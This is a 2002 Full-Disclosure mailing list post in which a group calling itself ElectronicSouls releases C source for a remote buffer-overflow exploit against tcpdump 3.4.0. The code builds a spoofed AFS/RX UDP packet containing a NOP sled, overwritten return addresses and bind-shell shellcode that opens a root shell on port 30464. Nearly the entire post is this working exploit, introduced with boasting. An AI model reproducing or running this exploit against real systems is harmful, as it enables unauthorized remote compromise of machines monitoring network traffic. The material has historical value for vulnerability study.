[Full-Disclosure] [ElectronicSouls] - tcpdump exploit

From: es@hush.com
Date: 11/29/02


From: es@hush.com (es@hush.com)
Date: Fri, 29 Nov 2002 00:11:44 -0800


-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We are releasing this for political reasons. We don't need to backdoor
tcpdump to get root on you, like those scriptkiddies do, we can find
our own bugs to exploit from mailing lists and then write our exploits.

Enjoy.

# cat ES-tcpdump-xp-not-finished.c
   /*
    * MAD PRIVATE !%&#*
    * Linux x86 Tcpdump 3.4.0 (maybe others!) Remote Exploit (with -s 500 or higher)
    * (C) BrainStorm - ElectronicSouls - \x45\x53 0wnez ;)
    * DO NOT DISTRIBUTE !
    */

    #include <stdio.h>
    #include <netinet/in.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <arpa/inet.h>

    /*
     * Exploit tuning constants.  ADDR is the base return address written
     * NUM_ADDR times into the datagram (see main()); OFFSET is added to it
     * and may be overridden by argv[2].  NOP/NUM_NOP describe the 0x90 sled
     * placed in front of the shellcode.
     */
    #define ADDR 0xbffff248
    #define OFFSET 0
    #define NUM_ADDR 10
    #define NOP 0x90
    #define NUM_NOP 100

    /*
     * RX/AFS protocol values used to make the datagram look like an AFS
     * fileserver call: the packet is sent from UDP port FS_RX_SPORT to
     * FS_RX_DPORT, and AFS_CALL is the first 32-bit word after the RX
     * header.  The meaning of the numeric values is taken from the macro
     * names only; it is not otherwise established on this page.
     */
    #define RX_CLIENT_INITIATED 1
    #define RX_PACKET_TYPE_DATA 1
    #define FS_RX_DPORT 7000
    #define FS_RX_SPORT 7001
    #define AFS_CALL 134

    /*
     * Wire layout of the RX packet header as this program builds it
     * (5 x u_int32_t, 4 x u_char, 2 x u_short; no padding is needed with
     * natural alignment).  It is overlaid on the start of the send buffer;
     * main() only fills in type, seq and flags and leaves the rest zero.
     */
    struct rx_header
    {
        u_int32_t epoch;
        u_int32_t cid;
        u_int32_t callNumber;
        u_int32_t seq;          /* set to htonl(1) in main() */
        u_int32_t serial;
        u_char type;            /* set to RX_PACKET_TYPE_DATA in main() */
        u_char flags;           /* set to RX_CLIENT_INITIATED in main() */
        u_char userStatus;
        u_char securityIndex;
        u_short spare;
        u_short serviceId;
    };

    /*
     * Hard-coded x86 Linux payload (a bind shell on port 30464 according to
     * the author's comment; not verified here).  It is copied into the
     * datagram with strlen(), so it must not contain a NUL byte, and byte 30
     * is patched at runtime by main() before the copy.
     */
    char shellcode[] = /* Taeho Oh bindshell code at port 30464 */
    "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
    "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
    "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
    "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
    "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
    "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
    "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
    "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
    "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
    "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
    "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

    /*
     * Turn a dotted-quad string or a host name into an IPv4 address in
     * network byte order, returned widened to long.  A dotted quad is
     * accepted as-is; anything else goes through gethostbyname().  On a
     * lookup failure the error is printed to stderr and the process exits
     * with status -1, so the function never returns an unresolved value.
     */
    long resolve(char *name)
    {
     long result = inet_addr(name);

     /* Numeric form parsed: nothing more to do. */
     if (result != -1) {
      return result;
     }

     struct hostent *he = gethostbyname(name);
     if (he == NULL) {
      fprintf(stderr, "Can't resolve host name [%s].\n", name);
      exit(-1);
     }

     /* Only the first (4-byte IPv4) address of the host entry is used. */
     memcpy(&result, he->h_addr, 4);
     return result;
    }

    /*
     * Build one UDP datagram shaped like an AFS/RX data packet and send it
     * from local port FS_RX_SPORT to port FS_RX_DPORT on the host named in
     * argv[1]; argv[2] optionally adjusts the return address.  The datagram
     * is what an observer would see on the wire: a fixed 7001 -> 7000 UDP
     * flow carrying exactly 520 bytes, an RX header, a run of 'A's, repeated
     * return addresses, a 0x90 sled and the shellcode.  The code assumes a
     * 32-bit target (sizeof(long) == 4), as stated in the file header; the
     * layout below is computed under that assumption.
     */
    int main (int argc, char *argv[]) {

     struct sockaddr_in addr,sin;
     int sock,aux, offset=OFFSET;
     char buffer[4048], *chptr;           /* only the first 520 bytes are sent */
     struct rx_header *rxh;
     long int *lptr, return_addr=ADDR;

     fprintf(stderr,"\n\n [ E l e c t r o n i c S o u l s ] \n");
     fprintf(stderr,"Tcpdump 3.4.0 Remote Exploit by BrainStorm\n\n");

     if (argc<2)
     {
     printf("Usage: %s <host> [offset]\n",argv[0]);
     exit(-1);
     }

     /* Optional second argument is added to the compiled-in base address. */
     if (argc==3) offset=atoi(argv[2]);
     return_addr+=offset;
     fprintf(stderr,"[+] Using return addr: %#x\n",return_addr);

     /* Destination: the resolved host, UDP port FS_RX_DPORT. */
     addr.sin_family=AF_INET;
     addr.sin_addr.s_addr=resolve(argv[1]);
     addr.sin_port=htons(FS_RX_DPORT);

     if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0)
     {
     perror("socket()");
     exit(-1);
     }
     /* Source port is pinned to FS_RX_SPORT by binding before sendto(). */
     sin.sin_family=AF_INET;
     sin.sin_addr.s_addr=INADDR_ANY;
     sin.sin_port=htons(FS_RX_SPORT);

     if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {
     perror("bind()");
     exit(-1);
     }
     /* Zero the whole buffer so any bytes not written below are sent as 0. */
     memset(buffer,0,sizeof(buffer));

     /* RX header at the start of the buffer; only type, seq and flags are set. */
     rxh=(struct rx_header *)buffer;
     rxh->type=RX_PACKET_TYPE_DATA;
     rxh->seq=htonl(1);
     rxh->flags=RX_CLIENT_INITIATED;

     /* Five big-endian words follow the header, the first being AFS_CALL. */
     lptr=(long int *)(buffer+sizeof(struct rx_header));

     *(lptr++)=htonl(AFS_CALL);
     *(lptr++)=htonl(1);
     *(lptr++)=htonl(2);
     *(lptr++)=htonl(3);
     *(lptr++)=htonl(420);

     /* sprintf() also writes a terminating NUL; chptr skips only the 4 text bytes. */
     chptr=(char *)lptr;
     sprintf(chptr,"1 0\n");
     chptr+=4;

     /* 120 bytes of filler. */
     memset(chptr,'A',120);
     chptr+=120;

     lptr=(long int *)chptr;

     /* NUM_ADDR copies of the return address, written in host byte order. */
     for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr;
     chptr=(char *)lptr;

     /* NUM_NOP-byte 0x90 sled ahead of the shellcode. */
     memset(chptr,NOP,NUM_NOP);
     chptr+=NUM_NOP;

     /* Patch byte 30 of the shellcode to 0x2e before copying; the reason is
      * not stated on this page. */
     shellcode[30]=(char)(46);

     memcpy(chptr,shellcode,strlen(shellcode));
     chptr+=strlen(shellcode);

     /* Trailer text after the shellcode. */
     sprintf(chptr," 1\n");

     /* Always sends exactly 520 bytes, which extends past the bytes built
      * above, so the tail is zero padding from the memset.  Note that &addr
      * is passed without the usual (struct sockaddr *) cast. */
     if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1)
     {
     perror("send()");
     exit(-1);
     }
     fprintf(stderr,"Overflow sent, now wait for your shell =) ..\n\n");
     close(sock);
     return(0);
    }

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Winner of the Best Eyes Award"

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nIU8MHGVzQGh1c2guY29tAAoJEN5nGqhGcjltGnYAnRPF4oJBlaU0
2AGLKlLdTNrRinezAJ9EpWGLb2K8esivw+01R5LKf4mCxQ==
=Bh2L
-----END PGP SIGNATURE-----



